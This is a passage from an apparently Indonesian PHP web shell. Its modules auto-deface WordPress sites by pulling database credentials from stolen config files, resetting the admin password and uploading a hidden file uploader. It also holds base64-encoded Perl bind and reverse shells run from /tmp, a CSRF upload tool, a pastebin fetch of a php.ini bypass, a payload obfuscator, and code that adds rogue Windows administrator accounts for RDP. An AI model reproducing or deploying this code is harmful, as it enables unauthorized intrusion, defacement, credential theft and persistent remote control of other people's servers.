  1740. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1741. $data = curl_exec($ch);
  1742. curl_close($ch);
  1743. return $data;
  1744. }
  1745. $link = explode("\r\n", $_POST['link']);
  1746. $script = htmlspecialchars($_POST['script']);
  1747. $user = "Davnisial";
  1748. $pass = "Davnisial";
  1749. $passx = md5($pass);
  1750. foreach($link as $dir_config) {
  1751. $config = anucurl($dir_config);
  1752. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1753. $dbuser = ambilkata($config,"DB_USER', '","'");
  1754. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1755. $dbname = ambilkata($config,"DB_NAME', '","'");
  1756. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1757. $prefix = $dbprefix."users";
  1758. $option = $dbprefix."options";
  1759. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1760. $db = mysql_select_db($dbname);
  1761. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1762. $result = mysql_fetch_array($q);
  1763. $id = $result[ID];
  1764. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1765. $result2 = mysql_fetch_array($q2);
  1766. $target = $result2[option_value];
  1767. if($target == '') {
  1768. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1769. } else {
  1770. echo "[+] $target <br>";
  1771. }
  1772. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1773. if(!$conn OR !$db OR !$update) {
  1774. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1775. mysql_close($conn);
  1776. } else {
  1777. $site = "$target/wp-login.php";
  1778. $site2 = "$target/wp-admin/theme-install.php?upload";
  1779. $b1 = anucurl($site2);
  1780. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1781. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1782. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1783. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1784. $www = "m.php";
  1785. $fp5 = fopen($www,"w");
  1786. fputs($fp5,$upload3);
  1787. $post2 = array(
  1788. "_wpnonce" => "$anu2",
  1789. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1790. "themezip" => "@$www",
  1791. "install-theme-submit" => "Install Now",
  1792. );
  1793. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1794. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1795. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1796. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1797. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1798. curl_setopt($ch, CURLOPT_POST, 1);
  1799. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1800. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1801. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1802. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1803. $data3 = curl_exec($ch);
  1804. curl_close($ch);
  1805. $y = date("Y");
  1806. $m = date("m");
  1807. $namafile = "id.php";
  1808. $fpi = fopen($namafile,"w");
  1809. fputs($fpi,$script);
  1810. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1811. curl_setopt($ch6, CURLOPT_POST, true);
  1812. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1813. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1814. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1815. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1816. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1817. $postResult = curl_exec($ch6);
  1818. curl_close($ch6);
  1819. $as = "$target/k.php";
  1820. $bs = anucurl($as);
  1821. if(preg_match("#$script#is", $bs)) {
  1822. echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1823. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1824. } else {
  1825. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1826. echo "[!!] coba aja manual: <br>";
  1827. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1828. echo "[+] username: <font color=white>$user</font><br>";
  1829. echo "[+] password: <font color=white>$pass</font><br><br>";
  1830. }
  1831. mysql_close($conn);
  1832. }
  1833. }
  1834. } else {
  1835. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1836. <form method='post'>
  1837. Link Config: <br>
  1838. <textarea name='link' placeholder='http://target.com/Dav_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1839. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Davnisial' required><br>
  1840. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1841. </form></center>";
  1842. }
  1843. } elseif($_GET['do'] == 'network') {
  1844. echo "<form method='post'>
  1845. <u>Bind Port:</u> <br>
  1846. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1847. <input type='submit' name='sub_bp' value='>>'>
  1848. </form>
  1849. <form method='post'>
  1850. <u>Back Connect:</u> <br>
  1851. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1852. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1853. <input type='submit' name='sub_bc' value='>>'>
  1854. </form>";
  1855. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1856. if(isset($_POST['sub_bp'])) {
  1857. $f_bp = fopen("/tmp/bp.pl", "w");
  1858. fwrite($f_bp, base64_decode($bind_port_p));
  1859. fclose($f_bp);
  1860.  
  1861. $port = $_POST['port_bind'];
  1862. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1863. sleep(1);
  1864. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1865. unlink("/tmp/bp.pl");
  1866. }
  1867. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1868. if(isset($_POST['sub_bc'])) {
  1869. $f_bc = fopen("/tmp/bc.pl", "w");
  1870. fwrite($f_bc, base64_decode($bind_connect_p));
  1871. fclose($f_bc);
  1872.  
  1873. $ipbc = $_POST['ip_bc'];
  1874. $port = $_POST['port_bc'];
  1875. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1876. sleep(1);
  1877. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1878. unlink("/tmp/bc.pl");
  1879. }
  1880. } elseif($_GET['do'] == 'csrf') {
  1881. ?> <html>
  1882. <title>CSRF EXPLOITER ONLINE</title>
  1883. <center><br><br><br><br>
  1884. <font color=white>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1885. <center>
  1886. <form method="post">
  1887. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1888. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1889. <input type="submit" name="d" value="Lock!">
  1890. </form>
  1891. <?php
  1892. //gak penting
  1893. @$url = $_POST['url'];
  1894. @$pf = $_POST['pf'];
  1895. @$d = $_POST['d'];
  1896. if($d) {
  1897. //baccod
  1898.  
  1899. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  1900. }
  1901. ?>
  1902. </form>
  1903. </html>
  1904. <?php
  1905.  
  1906. }
  1907. function parah($pastebin, $nama_file){
  1908. $usa = file_get_contents("$pastebin");
  1909. $frr = fopen("$nama_file", 'w');
  1910. fwrite($frr, $usa);
  1911. }
  1912. $xp = @$_GET['xp'];
  1913. if($xp == "bypassmod"){
  1914. $config = parah("https://pastebin.com/raw/3cjv499Y", "php.ini");
  1915. echo '<center><font color =red><a href="php.ini" target="_blank">Cek Disini Sayang :*</a><br></font></center>';
  1916. } elseif($_GET['do'] == 'endec') {
  1917. $text = $_POST['code'];
  1918. echo "<center>
  1919. <form method='post'><br>
  1920. <textarea placeholder='MASUKIN TEXT YANG MAU DI ENCRYPT/DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
  1921. <select class='inputz' size='1' name='ope'>
  1922. <option value='urlencode'>url</option>
  1923. <option value='json'>json</option>
  1924. <option value='ur'>convert_uu</option>
  1925. <option value='base64'>Base64</option>
  1926. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  1927. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
  1928. <option value='coeg'>gzinflate - base64</option>
  1929. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
  1930. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
  1931. <option value='str2'>str_rot13 - base64</option>
  1932. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  1933. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  1934. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 - base64</option>
  1935. <option value='gzpress'>gzcompress - base64</option>
  1936. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  1937. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  1938. </form>";
  1939. $submit = $_POST['submit'];
  1940. if (isset($submit)){
  1941. $op = $_POST["ope"];
  1942. switch ($op) {case 'base64': $codi=base64_encode($text);
  1943. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1944. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1945. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
  1946. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
  1947. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
  1948. break;case 'urlencode' : $codi=rawurlencode($text);
  1949. break;case 'ur' : $codi=convert_uuencode($text);
  1950. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1951. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1952. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1953. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1954. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1955. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  1956. break;default:break;}}
  1957. $submit = $_POST['submits'];
  1958. if (isset($submit)){
  1959. $op = $_POST["ope"];
  1960. switch ($op) {case 'base64': $codi=base64_decode($text);
  1961. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1962. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1963. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
  1964. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
  1965. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
  1966. break;case 'urlencode' : $codi=rawurldecode($text);
  1967. break;case 'ur' : $codi=convert_uudecode($text);
  1968. break;case 'json' : $codi=utf8_decode(json_decode($text));
  1969. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1970. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1971. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1972. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1973. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  1974. break;default:break;}}
  1975. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
  1976. fwrite($myfile, $codi);
  1977. fclose($myfile);
  1978. echo "<center><div id='kotakan'><br>
  1979. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
  1980. } elseif($_GET['do'] == 'krdp_shell') {
  1981. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1982. if($_POST['create']) {
  1983. $user = htmlspecialchars($_POST['user']);
  1984. $pass = htmlspecialchars($_POST['pass']);
  1985. if(preg_match("/$user/", exe("net user"))) {
  1986. echo "[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font>";
  1987. } else {
  1988. $add_user = exe("net user $user $pass /add");
  1989. $add_groups1 = exe("net localgroup Administrators $user /add");
  1990. $add_groups2 = exe("net localgroup Administrator $user /add");
  1991. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1992. echo "[ RDP ACCOUNT INFO ]<br>
  1993. ------------------------------<br>
  1994. IP: <font color=white>".$ip."</font><br>
  1995. Username: <font color=white>$user</font><br>
  1996. Password: <font color=white>$pass</font><br>
  1997. ------------------------------<br><br>
  1998. [ STATUS ]<br>
  1999. ------------------------------<br>
  2000. ";
  2001. if($add_user) {
  2002. echo "[add user] -> <font color='white'>Berhasil</font><br>";
  2003. } else {
  2004. echo "[add user] -> <font color='red'>Gagal</font><br>";
  2005. }
  2006. if($add_groups1) {
  2007. echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
  2008. } elseif($add_groups2) {
  2009. echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
  2010. } elseif($add_groups3) {
  2011. echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
  2012. } else {
  2013. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2014. }
  2015. echo "------------------------------<br>";
  2016. }
  2017. } elseif($_POST['s_opsi']) {
  2018. $user = htmlspecialchars($_POST['r_user']);
  2019. if($_POST['opsi'] == '1') {
  2020. $cek = exe("net user $user");
  2021. echo "Checking username <font color=white>$user</font> ....... ";
  2022. if(preg_match("/$user/", $cek)) {
  2023. echo "[ <font color=white>Sudah ada</font> ]<br>
  2024. ------------------------------<br><br>
  2025. <pre>$cek</pre>";
  2026. } else {
  2027. echo "[ <font color=red>belum ada</font> ]";
  2028. }
  2029. } elseif($_POST['opsi'] == '2') {
  2030. $cek = exe("net user $user Davnisial");
  2031. if(preg_match("/$user/", exe("net user"))) {
  2032. echo "[change password: <font color=red>Davnisial</font>] -> ";
  2033. if($cek) {
  2034. echo "<font color=white>Berhasil</font>";
  2035. } else {
  2036. echo "<font color=red>Gagal</font>";
  2037. }
  2038. } else {
  2039. echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
  2040. }
  2041. } elseif($_POST['opsi'] == '3') {
  2042. $cek = exe("net user $user /DELETE");
  2043. if(preg_match("/$user/", exe("net user"))) {
  2044. echo "[remove user: <font color=white>$user</font>] -> ";
  2045. if($cek) {
  2046. echo "<font color=white>Berhasil</font>";
  2047. } else {
  2048. echo "<font color=red>Gagal</font>";
  2049. }
  2050. } else {
  2051. echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
  2052. }
  2053. } else {
  2054. //
  2055. }
  2056. } else {
  2057. echo "-- Create RDP --<br>
  2058. <form method='post'>
  2059. <input type='text' name='user' placeholder='username' value='Davnisial' required>
  2060. <input type='text' name='pass' placeholder='password' value='Davnisial' required>
  2061. <input type='submit' name='create' value='>>'>
  2062. </form>
  2063. -- Option --<br>
  2064. <form method='post'>
  2065. <input type='text' name='r_user' placeholder='username' required>
  2066. <select name='opsi'>
  2067. <option value='1'>Cek Username</option>
  2068. <option value='2'>Ubah Password</option>
  2069. <option value='3'>Hapus Username</option>
  2070. </select>
  2071. <input type='submit' name='s_opsi' value='>>'>
  2072. </form>
  2073. ";
  2074. }
  2075. } else {
  2076. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2077. }
  2078. } elseif($_GET['act'] == 'newfile') {
  2079. if($_POST['new_save_file']) {
  2080. $newfile = htmlspecialchars($_POST['newfile']);
  2081. $fopen = fopen($newfile, "a+");
  2082. if($fopen) {
  2083. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2084. } else {
  2085. $act = "<font color=red>permission denied</font>";
  2086. }
  2087. }
  2088. echo $act;
  2089. echo "<form method='post'>
  2090. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2091. <input type='submit' name='new_save_file' value='Submit'>
  2092. </form>";
  2093. } elseif($_GET['act'] == 'newfolder') {
  2094. if($_POST['new_save_folder']) {
  2095. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2096. if(!mkdir($new_folder)) {
  2097. $act = "<font color=red>permission denied</font>";
  2098. } else {
  2099. $act = "<script>window.location='?dir=".$dir."';</script>";
  2100. }
  2101. }
  2102. echo $act;
  2103. echo "<form method='post'>
  2104. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2105. <input type='submit' name='new_save_folder' value='Submit'>
  2106. </form>";
  2107. } elseif($_GET['act'] == 'rename_dir') {
  2108. if($_POST['dir_rename']) {
  2109. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2110. if($dir_rename) {
  2111. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2112. } else {
  2113. $act = "<font color=red>permission denied</font>";
  2114. }
  2115. echo "".$act."<br>";
  2116. }
  2117. echo "<form method='post'>
  2118. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2119. <input type='submit' name='dir_rename' value='rename'>
  2120. </form>";
  2121. } elseif($_GET['act'] == 'delete_dir') {
  2122. if(is_dir($dir)) {
  2123. if(is_writable($dir)) {
  2124. @rmdir($dir);
  2125. @exe("rm -rf $dir");
  2126. @exe("rmdir /s /q $dir");
  2127. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2128. } else {
  2129. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2130. }
  2131. }
  2132. echo $act;
  2133. } elseif($_GET['act'] == 'view') {
  2134. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2135. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2136. } elseif($_GET['act'] == 'edit') {
  2137. if($_POST['save']) {
  2138. $save = file_put_contents($_GET['file'], $_POST['src']);
  2139. if($save) {
  2140. $act = "<font color=white>Saved!</font>";
  2141. } else {
  2142. $act = "<font color=red>permission denied</font>";
  2143. }
  2144. echo "".$act."<br>";
  2145. }
  2146. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2147. echo "<form method='post'>
  2148. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2149. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2150. </form>";
  2151. } elseif($_GET['act'] == 'rename') {
  2152. if($_POST['do_rename']) {
  2153. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2154. if($rename) {
  2155. $act = "<script>window.location='?dir=".$dir."';</script>";
  2156. } else {
  2157. $act = "<font color=red>permission denied</font>";
  2158. }
  2159. echo "".$act."<br>";
  2160. }
  2161. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2162. echo "<form method='post'>
  2163. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2164. <input type='submit' name='do_rename' value='rename'>
  2165. </form>";
  2166. } elseif($_GET['act'] == 'delete') {
  2167. $delete = unlink($_GET['file']);
  2168. if($delete) {
  2169. $act = "<script>window.location='?dir=".$dir."';</script>";
  2170. } else {
  2171. $act = "<font color=red>permission denied</font>";
  2172. }
  2173. echo $act;
  2174. } else {
  2175. if(is_dir($dir) === true) {
  2176. if(!is_readable($dir)) {
  2177. echo "<font color=red>can't open directory. ( not readable )</font>";
  2178. } else {
  2179. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2180. <tr>
  2181. <th class="th_home"><center>Name</center></th>
  2182. <th class="th_home"><center>Type</center></th>
  2183. <th class="th_home"><center>Size</center></th>
  2184. <th class="th_home"><center>Last Modified</center></th>
  2185. <th class="th_home"><center>Owner/Group</center></th>
  2186. <th class="th_home"><center>Permission</center></th>
  2187. <th class="th_home"><center>Action</center></th>
  2188. </tr>';
  2189. $scandir = scandir($dir);
  2190. foreach($scandir as $dirx) {
  2191. $dtype = filetype("$dir/$dirx");
  2192. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2193. if(function_exists('posix_getpwuid')) {
  2194. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2195. $downer = $downer['name'];
  2196. } else {
  2197. //$downer = $uid;
  2198. $downer = fileowner("$dir/$dirx");
  2199. }
  2200. if(function_exists('posix_getgrgid')) {
  2201. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2202. $dgrp = $dgrp['name'];
  2203. } else {
  2204. $dgrp = filegroup("$dir/$dirx");
  2205. }
  2206. if(!is_dir("$dir/$dirx")) continue;
  2207. if($dirx === '..') {
  2208. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2209. } elseif($dirx === '.') {
  2210. $href = "<a href='?dir=$dir'>$dirx</a>";
  2211. } else {
  2212. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2213. }
  2214. if($dirx === '.' || $dirx === '..') {
  2215. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2216. } else {
  2217. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2218. }
  2219. echo "<tr>";
  2220. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2221. echo "<td class='td_home'><center>$dtype</center></td>";
  2222. echo "<td class='td_home'><center>-</center></th></td>";
  2223. echo "<td class='td_home'><center>$dtime</center></td>";
  2224. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2225. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2226. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2227. echo "</tr>";
  2228. }
  2229. }
  2230. } else {
  2231. echo "<font color=red>can't open directory.</font>";
  2232. }
  2233. foreach($scandir as $file) {
  2234. $ftype = filetype("$dir/$file");
  2235. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2236. $size = filesize("$dir/$file")/1024;
  2237. $size = round($size,3);
  2238. if(function_exists('posix_getpwuid')) {
  2239. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2240. $fowner = $fowner['name'];
  2241. } else {
  2242. //$downer = $uid;
  2243. $fowner = fileowner("$dir/$file");
  2244. }
  2245. if(function_exists('posix_getgrgid')) {
  2246. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2247. $fgrp = $fgrp['name'];
  2248. } else {
  2249. $fgrp = filegroup("$dir/$file");
  2250. }
  2251. if($size > 1024) {
  2252. $size = round($size/1024,2). 'MB';
  2253. } else {
  2254. $size = $size. 'KB';
  2255. }
  2256. if(!is_file("$dir/$file")) continue;
  2257. echo "<tr>";
